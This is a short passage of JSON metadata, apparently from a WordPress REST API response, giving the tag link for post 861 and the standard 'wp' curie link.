rue,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=861"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}